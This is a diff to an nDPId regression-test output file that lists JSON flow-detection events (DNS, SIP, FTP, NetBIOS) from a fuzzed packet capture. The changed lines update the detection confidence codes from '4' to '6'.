00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":684,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470899862,"flow_last_seen":1120470899862,"flow_idle_time":200000,"flow_min_l4_payload_len":1076,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":1076,"flow_avg_l4_payload_len":1076,"midstream":0,"thread_ts_msec":1120471087098,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":17860,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00604{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":684,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470899862,"flow_last_seen":1120470899862,"flow_idle_time":200000,"flow_min_l4_payload_len":1076,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":1076,"flow_avg_l4_payload_len":1076,"midstream":0,"thread_ts_msec":1120471087098,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":17860,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":684,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470899865,"flow_last_seen":1120470899865,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471087098,"l3_proto":"ip4","src_ip":"192.170.1.2","dst_ip":"192.168.1.1","src_port":2810,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":684,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120471084097,"flow_last_seen":1120471088463,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1120471088463,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2830,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"212.242.33.35"}} +00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":684,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120471084097,"flow_last_seen":1120471088463,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1120471088463,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2830,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"212.242.33.35"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":687,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471094410,"flow_last_seen":1120471094410,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471094410,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2831,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":687,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":1,"flow_last_seen":1120471094410,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120471094410,"pkt":"ADBUADRWAODtAW5TCABFAABEbGgAAIARSu3AqAECwKgBAQsPADUAMMF5YzYAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":687,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471094410,"flow_last_seen":1120471094410,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471094410,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2831,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":687,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471094410,"flow_last_seen":1120471094410,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471094410,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2831,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":688,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":2,"flow_last_seen":1120471094412,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120471094412,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1Cw8AR6P1dTaAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} -00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":688,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120471094410,"flow_last_seen":1120471094412,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120471094412,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2831,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} +00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":688,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120471094410,"flow_last_seen":1120471094412,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120471094412,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2831,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00882{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":690,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470908872,"flow_last_seen":1120470908872,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471094413,"l3_proto":"ip4","src_ip":"128.168.1.2","dst_ip":"192.168.1.1","src_port":2810,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"1":"Match by port"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":690,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470908872,"flow_last_seen":1120470908872,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471094413,"l3_proto":"ip4","src_ip":"128.168.1.2","dst_ip":"192.168.1.1","src_port":2810,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":690,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120471106433} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":690,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120471094413,"pkt":"ADBUADRWAODtAW69CABFAABIbG4A3oARSuPAqAECwKgBAQsQJXMANDd+8jYBAFEBAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471107427,"flow_last_seen":1120471107427,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2832,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":257,"flow_packet_id":1,"flow_last_seen":1120471107427,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120471107427,"pkt":"ADBUADRWAODtAW69CABFAABIbJIAAIARSuLAqAECwKgBAQsQADUANDd+8jYBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471107427,"flow_last_seen":1120471107427,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2832,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471107427,"flow_last_seen":1120471107427,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2832,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00826{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635042,"flow_last_seen":1120469635042,"flow_idle_time":7580000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.2.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} 00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635042,"flow_last_seen":1120469635042,"flow_idle_time":7580000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.2.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00827{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635179,"flow_last_seen":1120469635179,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"37.115.0.2","dst_ip":"147.234.1.253","src_port":2639,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} @@ -1359,18 +1359,18 @@ 00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635128,"flow_last_seen":1120469635128,"flow_idle_time":7580000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.117.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635049,"flow_last_seen":1120469635049,"flow_idle_time":7580000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":1045,"dst_port":2720,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635049,"flow_last_seen":1120469635049,"flow_idle_time":7580000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":1045,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120471068711,"flow_last_seen":1120471068711,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"62.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120471067211,"flow_last_seen":1120471067211,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":11,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120471068711,"flow_last_seen":1120471068711,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"62.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120471067211,"flow_last_seen":1120471067211,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":11,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00616{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635045,"flow_last_seen":1120469635045,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00601{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635045,"flow_last_seen":1120469635045,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1120469540839,"flow_last_seen":1120471067960,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":3442,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00820{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120471033895,"flow_last_seen":1120471033895,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470984353,"flow_last_seen":1120470984353,"flow_idle_time":200000,"flow_min_l4_payload_len":324,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":324,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.201","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120471001263,"flow_last_seen":1120471001263,"flow_idle_time":200000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.234.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1120470796941,"flow_last_seen":1120471094413,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1065,"flow_tot_l4_payload_len":10425,"flow_avg_l4_payload_len":453,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1120469540839,"flow_last_seen":1120471067960,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":3442,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00820{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120471033895,"flow_last_seen":1120471033895,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470984353,"flow_last_seen":1120470984353,"flow_idle_time":200000,"flow_min_l4_payload_len":324,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":324,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.201","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 